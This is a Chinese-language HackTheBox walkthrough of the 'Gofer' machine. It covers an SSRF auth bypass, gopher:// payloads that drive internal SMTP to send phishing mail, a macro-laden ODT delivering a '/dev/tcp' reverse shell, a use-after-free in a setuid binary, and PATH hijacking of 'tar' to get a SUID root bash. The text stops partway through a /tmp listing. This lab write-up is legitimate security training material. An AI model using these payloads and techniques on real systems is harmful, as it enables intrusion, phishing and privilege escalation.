[HTB] gofer

First Post:

Last Update:

Word Count:
5.9k

Read Time:
31 min

96848020b3fdeb25420182fab6f76b9012342800

前言

懒得写了。

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
$ sudo nmap -p- --min-rate=10000 10.10.11.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 02:22 EDT
Nmap scan report for 10.10.11.225
Host is up (0.075s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
139/tcp open     netbios-ssn
445/tcp open     microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.06 seconds

$ sudo nmap -sT -sV -sC -O -p22,25,80,139,445 10.10.11.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 02:24 EDT
Nmap scan report for 10.10.11.225
Host is up (0.074s latency).

PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 aa:25:82:6e:b8:04:b6:a9:a9:5e:1a:91:f0:94:51:dd (RSA)
|   256 18:21:ba:a7:dc:e4:4f:60:d7:81:03:9a:5d:c2:e5:96 (ECDSA)
|_  256 a4:2d:0d:45:13:2a:9e:7f:86:7a:f6:f7:78:bc:42:d9 (ED25519)
25/tcp  filtered smtp
80/tcp  open     http        Apache httpd 2.4.56
|_http-title: Did not follow redirect to http://gofer.htb/
|_http-server-header: Apache/2.4.56 (Debian)
139/tcp open     netbios-ssn Samba smbd 4.6.2
445/tcp open     netbios-ssn Samba smbd 4.6.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linnux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: gofer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
|   date: 2023-08-04T06:24:34
|_  start_date: N/A
|_nbstat: NetBIOS name: GOFER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: 10s

OS and Service detection performed. Please report any incorrect results at https://nmap.or
Nmap done: 1 IP address (1 host up) scanned in 27.81 seconds

$ sudo nmap --script=vuln 10.10.11.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 02:26 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for gofer.htb (10.10.11.225)
Host is up (0.078s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|     Couldn't find a file-type field.
|
|_    Couldn't find a file-type field.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=gofer.htb
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://gofer.htb:80/
|     Form id:
|     Form action:
|
|     Path: http://gofer.htb:80/index.html
|     Form id:
|_    Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open     netbios-ssn
445/tcp open     microsoft-ds

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less datsing); aborting [9]
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned lare missing); aborting [9]

Nmap done: 1 IP address (1 host up) scanned in 89.27 seconds

25端口被filter了,可能是防火墙啥的。80开着可以看看,139和445的smb服务肯定是第一个要看的。那么大体路径就是这样了。

whatweb

1
2
3
4
5
6
7
8
9
$ sudo whatweb 10.10.11.225
[sudo] password for meamea:
http://10.10.11.225 [301 Moved Permanently] Apache[2.4.56], Country[RESERVED][ZZ], HTTPSer1.225], RedirectLocation[http://gofer.htb/], Title[301 Moved Permanently]
ERROR Opening: http://gofer.htb/ - no address for gofer.htb

$ sudo vim /etc/hosts

$ sudo whatweb http://gofer.htb
http://gofer.htb [200 OK] Apache[2.4.56], Bootstrap, Country[RESERVED][ZZ], Email[info@gofe/2.4.56 (Debian)], IP[10.10.11.225], Lightbox, Script, Title[Gofer]

我们把域名加到hosts里面。

nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ sudo nikto -h http://gofer.htb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.225
+ Target Hostname:    gofer.htb
+ Target Port:        80
+ Start Time:         2023-08-04 02:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.ms
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to rendthe MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/m
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 72c4, size: 5fa663in/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ 7962 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-08-04 02:37:23 (GMT-4) (630 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

没啥信息。

smb渗透

1
2
3
4
5
6
7
$ smbmap -H 10.10.11.225
[+] IP: 10.10.11.225:445        Name: gofer.htb
        Disk             Permissions     Comment
        ----             -----------     -------
        print$           NO ACCESS       Printer Drivers
        shares           READ ONLY
        IPC$             NO ACCESS       IPC Service (Samba 4.13.13-Debian)

smbmap先扫一下都共享了哪些目录以及哪些目录是可以访问的。我们发现shares可以读,我们直接连接看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ smbclient \\\\10.10.11.225\\shares
Password for [WORKGROUP\me]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct 28 15:32:08 2022
  ..                                  D        0  Fri Apr 28 07:59:34 2023
  .backup                            DH        0  Thu Apr 27 08:49:32 2023

                5061888 blocks of size 1024. 2164028 blocks available
smb: \> cd .backup\
smb: \.backup\> ls
  .                                   D        0  Thu Apr 27 08:49:32 2023
  ..                                  D        0  Fri Oct 28 15:32:08 2022
  mail                                N     1101  Thu Apr 27 08:49:32 2023

                5061888 blocks of size 1024. 2164008 blocks available
smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \.backup\> exit

我们发现有封邮件,直接下载下来看看内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. From  now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt forma saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seet should be possible to do so via <Limit>

省流一下,邮件主要有几个值得注意的点:

  1. Jocelyn最近又收到了钓鱼邮件,并且她(我就是要假定性别)有喜欢乱点链接的习惯。
  2. 之后在内部传文件会用邮件传并且最好要求是.odt格式的文件
  3. Tom正在搞网页代理,并且他的访问限制可能做的不是特别严格。
  4. 邮件中的名字都有可能是用户名,可以留意一下,例如tbuckley、jdavis、Jocelyn、Tom

其中第3条的网页代理提示我们可能存在子域名,其他信息目前还不知道有没有用,接着看吧。

web渗透

访问网站

db9d96c1f276bda77d23b06a9a9708f4

进网页看了一圈也没啥有用的。那就目录扫描和FUZZ一下子域名看看。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
$ sudo feroxbuster -u http://gofer.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x odt -n

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://gofer.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [odt]
 🏁  HTTP methods          │ [GET]
 🚫  Do Not Recurse        │ true
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       81l      197w     2590c http://gofer.htb/assets/vendor/php-email-form/validate.js
200      GET        7l       27w     3309c http://gofer.htb/assets/img/apple-touch-icon.png
200      GET      621l     2087w    29380c http://gofer.htb/index.html
200      GET      237l      526w     5700c http://gofer.htb/assets/js/main.js
200      GET        9l       23w      847c http://gofer.htb/assets/img/favicon.png
200      GET       90l      527w    40608c http://gofer.htb/assets/img/testimonials/testimonials-5.jpg
200      GET      130l      463w    27174c http://gofer.htb/assets/img/portfolio/portfolio-8.jpg
200      GET        1l      233w    13749c http://gofer.htb/assets/vendor/glightbox/css/glightbox.min.css
200      GET       88l      408w    36465c http://gofer.htb/assets/img/testimonials/testimonials-4.jpg
200      GET       13l      171w    16468c http://gofer.htb/assets/vendor/swiper/swiper-bundle.min.css
200      GET      261l     1188w    94694c http://gofer.htb/assets/img/about-img.jpg
200      GET      259l     1656w   147504c http://gofer.htb/assets/img/portfolio/portfolio-5.jpg
200      GET      187l      991w    87460c http://gofer.htb/assets/img/team/team-4.jpg
200      GET        1l      133w    68028c http://gofer.htb/assets/vendor/boxicons/css/boxicons.min.css
200      GET      369l     2025w   164200c http://gofer.htb/assets/img/team/team-2.jpg
200      GET      147l      628w    44741c http://gofer.htb/assets/img/portfolio/portfolio-6.jpg
200      GET     1535l     3031w    26660c http://gofer.htb/assets/css/style.css
200      GET       14l     1684w   143629c http://gofer.htb/assets/vendor/swiper/swiper-bundle.min.js
200      GET        1l      313w    14690c http://gofer.htb/assets/vendor/aos/aos.js
301      GET        9l       28w      307c http://gofer.htb/assets => http://gofer.htb/assets/
200      GET      160l      818w    71959c http://gofer.htb/assets/img/testimonials/testimonials-1.jpg
200      GET        1l      625w    55880c http://gofer.htb/assets/vendor/glightbox/js/glightbox.min.js
200      GET      148l      914w    83895c http://gofer.htb/assets/img/portfolio/portfolio-2.jpg
200      GET      246l     1284w   100163c http://gofer.htb/assets/img/portfolio/portfolio-3.jpg
200      GET      345l     1897w   135739c http://gofer.htb/assets/img/portfolio/portfolio-1.jpg
200      GET        7l     2189w   194901c http://gofer.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200      GET      316l     1853w   153340c http://gofer.htb/assets/img/team/team-1.jpg
200      GET      247l     1374w    99927c http://gofer.htb/assets/img/team/team-3.jpg
200      GET       71l      380w    30729c http://gofer.htb/assets/img/testimonials/testimonials-3.jpg
200      GET        1l      218w    26053c http://gofer.htb/assets/vendor/aos/aos.css
200      GET      488l     2828w   220492c http://gofer.htb/assets/img/portfolio/portfolio-7.jpg
200      GET      244l     1332w   103224c http://gofer.htb/assets/img/testimonials/testimonials-2.jpg
200      GET      120l      567w    48988c http://gofer.htb/assets/img/portfolio/portfolio-4.jpg
200      GET       12l      557w    35445c http://gofer.htb/assets/vendor/isotope-layout/isotope.pkgd.min.js
200      GET     1876l     9310w    88585c http://gofer.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200      GET      238l     1343w   105633c http://gofer.htb/assets/img/portfolio/portfolio-9.jpg
200      GET        7l     1223w    80496c http://gofer.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200      GET      621l     2087w    29380c http://gofer.htb/
[####################] - 12m   220605/220605  0s      found:38      errors:7
[####################] - 12m   220546/220546  318/s   http://gofer.htb/

没发现啥有用的。

子域名FUZZ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ wfuzz -H "Host: FUZZ.gofer.htb" --hc 404,403 --hw 28 -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt http://gofer.htb
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://gofer.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000084:   401        14 L     54 W       462 Ch      "proxy"

Total time: 40.14814
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 124.2647

这个proxy多半就是tom弄的网页代理了,我们把它加入hosts后再访问。

proxy

访问一下看看。

32c53ba8b4763d2b58bfc4e4ece9ad57

上来就让我们登录,简单用之前发现的用户名尝试一下弱密码,都没成功。想起之前邮件提到说访问限制做的不好。访问限制做的不好很可能导致马奇诺防线,意思是可能只针对一种请求方式做了严格限制,对其他的请求方式没做限制。

我们试试其他请求方式看看。

62511d1220a36ace7045fd4ccf05aecc

然而全都报了401未授权,我们再试试直接访问页面试试,我们通过wappalyzer发现网站使用php写的。

fc965d29477d4d9ced95a1dd6a716d10

那我们访问index.php默认页面试试。

e85620fa7283cd33e1a04fe76ca8e20a

果然,报200了,绕过授权了,但是提示确实URL参数,我们加上试试看。

我们直接尝试http://proxy.gofer.htb/index.php?url=127.0.0.1

好家伙,直接返回了80端口的web主页,得,妥妥的SSRF漏洞。

SSRF利用

既然已经验证ssrf存在,我们直接上手利用,用curl其实比较方便,继续用火狐也行。

1
2
3
$ curl proxy.gofer.htb/index.php?url=file:///etc/passwd -X POST
<!-- Welcome to Gofer proxy -->
<html><body>Blacklisted keyword: file:// !</body></html>

想试试LFI的,可惜明显过滤了file协议,其他常用的协议还有goferdict以及http等。突然发现了华点,这台机子不就叫gofer吗,暗示我们该用gofer协议?gofer协议主要用于发送GET以及POST请求以及攻击内网应用。

我们有攻击内网应用的需求吗?被filter的25端口smtp呗。显然smtp只能在内网使用,刚好我们可以通过ssrf伪造成服务器在内部发邮件。回忆之前的邮件内容,是时候再钓一钓喜欢乱点链接的Jocelyn的鱼咯。

钓鱼邮件构造

我们直接搜索ssrf smtp gofer就会出来一堆利用教程,附一点相关资料:hacktricksgithub。或者我们可以使用Gopherus这个工具生成pyload。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ gopherus --exploit smtp


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$


Give Details to send mail:

Mail from :  jdavis@gofer.htb
Mail To :  jocelyn@gofer.htb
Subject :  Important!
Message :  <a href="http://<HTB_VPN_IP>:19198/door.sh">read</a>

Your gopher link is ready to send Mail:

gopher://127.0.0.1:25/_MAIL%20FROM:jdavis%40gofer.htb%0ARCPT%20To:jocelyn%40gofer.htb%0ADATA%0AFrom:jdavis%40gofer.htb%0ASubject:Important%21%0AMessage:%3Ca%20href%3D%22http://<HTB_VPN_IP>:19198/door.sh%22%3Eread%3C/a%3E%0A.

直接用这个paylod你会发现/127也在黑名单里面,好在ssrf绕过里面好多对本地地址的绕过,我们可以使用10进制的地址2130706433,一样是代表127.0.0.1

door.sh的内容其实就是反弹shell的命令:/bin/bash -i >& /dev/tcp/<HTB_VPN_IP>/11451 0>&1

然后payload的内容要经过URL编码,不然没反应。

我们尝试一下

1
2
3
4
5
6
7
8
$ curl proxy.gofer.htb/index.php?url=gopher%3A%2F%2F2130706433%3A25%2F_MAIL%2520FROM%3Atest%2540test.htb%250ARCPT%2520To%3Ajocelyn%2540gofer.htb%250ADATA%250AFrom%3Ajdavis%2540gofer.htb%250ASubject%3AImportant%2521%250AMessage%3A%253Ca%2520href%253D%2522http%3A%2F%2F<HTB_VPN_IP>%3A19198%2Fdoor.sh%2522%253Eread%253C%2Fa%253E%250A. -X POST
<!-- Welcome to Gofer proxy -->
220 gofer.htb ESMTP Postfix (Debian/GNU)
250 2.1.0 Ok
550 5.1.1 <jocelyn@gofer.htb>: Recipient address rejected: User unknown in local recipient table
554 5.5.1 Error: no valid recipients
221 2.7.0 Error: I can break rules, too. Goodbye.
1

提示没有收件人,何意啊。。。她不就叫jocelyn吗。观察了一下开始那封邮件,发件人叫jdavis,我们去官网看看他是不是就叫这个。

image-20230805172809145

草,原来是缩写。Tom Buckley的用户名确实也是tbuckley,所以Jocelyn Hudson的用户名应该叫jhudson。改完试试看。

1
$ curl proxy.gofer.htb/index.php?url=gopher%3A%2F%2F2130706433%3A25%2F_MAIL%2520FROM%3Ajdavis%2540gofer.htb%250ARCPT%2520To%3Ajhudson%2540gofer.htb%250ADATA%250AFrom%3Ajdavis%2540gofer.htb%250ASubject%3AImportant%2521%250AMessage%3A%253Ca%2520href%253D%2522http%3A%2F%2F<HTB_VPN_IP>%3A19198%2Fdoor.sh%2522%253Eread%253C%2Fa%253E%250A. -X POST

我们在本地起一个http服务器并开一个nc端口监听,然后我们就会发现Jocelyn确实点了链接,然而却没能给我们反弹shell。可能做了限制,结合之前邮件,可能只有在邮件里传.odt文件他们才会打开。

恶意odt文件构造

本来先尝试用msfexploit/multi/fileformat/libreoffice_macro_exec构造的文件,可惜传上去怎么都不能成功拿到shell,我不知道是哪里出了问题。

再搜了搜看看,发现有文章详细介绍了如何手动构造恶意odt文件

步骤:

  1. 打开libreoffice,选择工具–>宏–>管理宏–>使用Basic语言

  2. 21070dc8fff0a64ada2f04298e125ac9按文章那样利用Shell()函数构造反弹shell,但是其实不用像文章那样分三步这么麻烦。还有要注意的是,外面一定要套一个bash -c,不然收不到shell,很搞。

  3. 宏写好后,要在自定义里面指定在文件打开时自动执行我们的宏。

    994e84c936c6d7bae83728199a99e20b

  4. 保存,ok力。

获取立足点

1
$ curl -X POST proxy.gofer.htb/index.php?url=gopher%3A%2F%2F2130706433%3A25%2F_MAIL%2520FROM%3Ajdavis%2540gofer.htb%250ARCPT%2520To%3Ajhudson%2540gofer.htb%250ADATA%250AFrom%3Ajdavis%2540gofer.htb%250ASubject%3AImportant%250AMessage%3A%253Ca%2520href%253D%2522%2520http%3A%2F%2F<HTB_VPN_IP>%3A19198%2Fexp.odt%2520%2522%253Eread%253C%2Fa%253E%250A.
1
2
3
$ python -m http.server 19198
Serving HTTP on 0.0.0.0 port 19198 (http://0.0.0.0:19198/) ...
10.10.11.225 - - [04/Aug/2023 13:28:50] "GET /exp.odt HTTP/1.1" 200 -
1
2
3
4
5
6
7
$ sudo nc -nlvp 11451
listening on [any] 11451 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.225] 34542
bash: cannot set terminal process group (4974): Inappropriate ioctl for device
bash: no job control in this shell
bash: /home/jhudson/.bashrc: Permission denied
jhudson@gofer:/usr/bin$

成功拿下,user flag在home目录下。

提权

pspy64获取信息

sudo用不了。

查找s位程序倒是有发现。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
jhudson@gofer:/usr/bin$ find / -type f -perm -04000 2>/dev/null
find / -type f -perm -04000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/local/bin/notes
You have mail in /var/mail/jhudson
jhudson@gofer:/usr/bin$ ls -la /usr/local/bin/notes
ls -la /usr/local/bin/notes
-rwsr-s--- 1 root dev 17168 Apr 28 16:06 /usr/local/bin/notes
jhudson@gofer:/usr/bin$ id
id
uid=1000(jhudson) gid=1000(jhudson) groups=1000(jhudson),108(netdev)

然而jhudson并不是dev组的,研究不了这个notes,我们看看能不能想办法提权到dev组用户。

crontab也没有有意思的。

例行公事,pspy64和linpeas看一看。

c2a740168ab99dd253c3e22c888ea9ca

等了一段时间,pspy64直接传回捷报,有一串tbuckley的登陆凭证,虽然不知道是不是,我们直接试试ssh登录看看,发现能成功登录,赢!

1
2
3
4
5
6
7
8
9
10
11
12
13
$ ssh tbuckley@10.10.11.225
tbuckley@10.10.11.225's password:
Linux gofer.htb 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2023-07-14) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have no mail.
tbuckley@gofer:~$ id
uid=1002(tbuckley) gid=1002(tbuckley) groups=1002(tbuckley),1004(dev)

好巧不巧的是,tbuckley刚好是dev组的,那不撞枪口上了,直接研究一下notes。

逆向notes

我们首先执行一下看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
tbuckley@gofer:/usr/local/bin$ ls -la
total 28
drwxr-xr-x  2 root root  4096 Apr 28 16:06 .
drwxr-xr-x 10 root root  4096 Oct 28  2022 ..
-rwsr-s---  1 root dev  17168 Apr 28 16:06 notes
tbuckley@gofer:/usr/local/bin$ ./notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice:

看起来像是一个写笔记的程序,测试了一下发现确实是差不多的。

那我们把程序丢进ida逆向下看看其大体流程。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *v3; // rax
  int v5; // [rsp+Ch] [rbp-14h] BYREF
  void *ptr; // [rsp+10h] [rbp-10h]
  void *s; // [rsp+18h] [rbp-8h]

  v5 = 0;
  s = 0LL;
  ptr = 0LL;
  while ( 1 )
  {
    puts(
      "========================================\n"
      "1) Create an user and choose an username\n"
      "2) Show user information\n"
      "3) Delete an user\n"
      "4) Write a note\n"
      "5) Show a note\n"
      "6) Save a note (not yet implemented)\n"
      "7) Delete a note\n"
      "8) Backup notes\n"
      "9) Quit\n"
      "========================================\n"
      "\n");
    printf("Your choice: ");
    __isoc99_scanf("%d", &v5);
    puts(&byte_212E);
    switch ( v5 )
    {
      case 1:
        s = malloc(0x28uLL);
        if ( !s )
          exit(-1);
        memset(s, 0, 0x18uLL);
        memset((char *)s + 24, 0, 0x10uLL);
        if ( getuid() )
        {
          *((_DWORD *)s + 6) = 'resu';
        }
        else
        {
          v3 = (char *)s + 24;
          *((_DWORD *)s + 6) = 'imda';
          v3[4] = 'n';
        }
        printf("Choose an username: ");
        __isoc99_scanf("%23s", s);
        puts(&byte_212E);
        continue;
      case 2:
        if ( !s )
          goto LABEL_11;
        printf("\nUsername: %s\n", (const char *)s);
        printf("Role: %s\n\n", (const char *)s + 24);
        break;
      case 3:
        if ( s )
          free(s);
        continue;
      case 4:
        ptr = malloc(0x28uLL);
        memset(ptr, 0, 0x28uLL);
        if ( !ptr )
          exit(-1);
        puts("Write your note:");
        __isoc99_scanf("%39s", ptr);
        continue;
      case 5:
        printf("Note: %s\n\n", (const char *)ptr);
        continue;
      case 6:
        puts("Coming soon!\n");
        continue;
      case 7:
        if ( ptr )
        {
          free(ptr);
          ptr = 0LL;
        }
        continue;
      case 8:
        if ( s )
        {
          if ( !strcmp((const char *)s + 24, "admin") )
          {
            puts("Access granted!");
            setuid(0);
            setgid(0);
            system("tar -czvf /root/backups/backup_notes.tar.gz /opt/notes");
          }
          else
          {
            puts("Access denied: you don't have the admin role!\n");
          }
        }
        else
        {
LABEL_11:
          puts("First create an user!\n");
        }
        break;
      default:
        exit(0);
    }
  }
}

我们首先可以看到case 8里面有用root权限执行一条命令,那我们馋哭了,多么希望能绕过前面的用户身份验证。

再仔细分析一下,我们会发现case3删除用户处,只释放了空间,并没有将指针赋零,如果我们仔细看case7删除笔记功能就会发现,正确的流程是free之后要将指针赋零,不然会导致问题。我们听听麦克阿瑟chatgpt怎么说:

461de25446473fab19558ef19abe00c6

很明显,这样会存在野指针的问题。我们该如何利用呢?

我们看到case1创建用户时开辟的空间是0x28的40字节的空间s,case8检查用户身份的时候,检测的是s的第24位开始是否是admin。case 4分配同样分配的是40字节的空间,因为指针没置0所以很可能分到刚才的地址s。

结合以上的分析,我们可以这样利用:

1.创建任意用户–>2.删除用户,造成野指针–>3.写笔记,前24位用户名随便填写,然后填上admin作为用户身份–>4.运行8,此时可以通过用户身份验证。

然后接下来tar -czvf /root/backups/backup_notes.tar.gz /opt/notes这一条就好弄了,tar没用绝对地址,用的相对地址,那我们在PATH里面加上我们构造的tar就完事了,然后执行8就会以root权限执行我们的命令。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
tbuckley@gofer:/usr/local/bin$ ./notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 1

Choose an username: whatever

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 3

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 4

Write your note:
xxxxxxxxxxxxxxxxxxxxxxxxadmin
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: xxxxxxxxxxxxxxxxxxxxxxxxadmin
Role: admin

正如我们所想,完美。

再构造一下tar。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
tbuckley@gofer:/tmp$ echo 'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash' > tar
tbuckley@gofer:/tmp$ chmod +x tar
tbuckley@gofer:/tmp$ ls -la
total 60
drwxrwxrwt 14 root     root     4096 Aug  5 15:49 .
drwxr-xr-x 18 root     root     4096 Jul 19 12:44 ..
drwxrwxrwt  2 root     root     4096 Aug  5 08:05 .font-unix
drwxr-xr-x  2 jhudson  jhudson  4096 Aug  5 14:36 hsperfdata_jhudson
drwxrwxrwt  2 root     root     4096 Aug  5 08:05 .ICE-unix
drwx------  3 jhudson  jhudson  4096 Aug  5 11:02 lu5012xuigb9.tmp
drwx------  2 jhudson  jhudson  4096 Aug  5 14:36 lu9624y25uma.tmp
srwxr-xr-x  1 jhudson  jhudson     0 Aug  5 14:36 OSL_PIPE_1000_SingleOfficeIPC_b31bb423faa33322afe433cf9acd1272
drwx------  3 root     root     4096 Aug  5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-apache2.service-1K3kih
drwx------  3 root     root     4096 Aug  5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-logind.service-FsKf3f
drwx------  3 root     root     4096 Aug  5 08:05 systemd-private-711ebd4724b24c22b4a90210e66cc476-systemd-timesyncd.service-0MAATi
